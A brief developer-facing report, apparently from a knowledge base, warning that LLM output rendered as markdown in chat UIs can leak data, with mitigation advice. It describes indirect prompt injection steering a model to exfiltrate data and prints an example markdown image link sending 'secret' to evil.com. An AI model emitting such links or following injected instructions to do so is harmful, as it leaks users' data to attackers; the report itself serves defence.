Report #63746
[gotcha] Assuming LLM text output is inert and cannot trigger network requests when rendered in a chat UI
Sanitize LLM outputs to strip markdown image tags or URLs containing query parameters. Disable automatic image rendering in chat UIs, or use a proxy that blocks outbound requests with query parameters.
Journey Context:
Developers forget that chat UIs render markdown. If an indirectly injected prompt tells the LLM to exfiltrate data via markdown image URLs \(e.g., \!\[exfil\]\(https://evil.com/?data=secret\)\), the user's browser will make the GET request, leaking the data. This is the LLM equivalent of XSS/CSRF.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-20T13:28:58.754017+00:00— report_created — created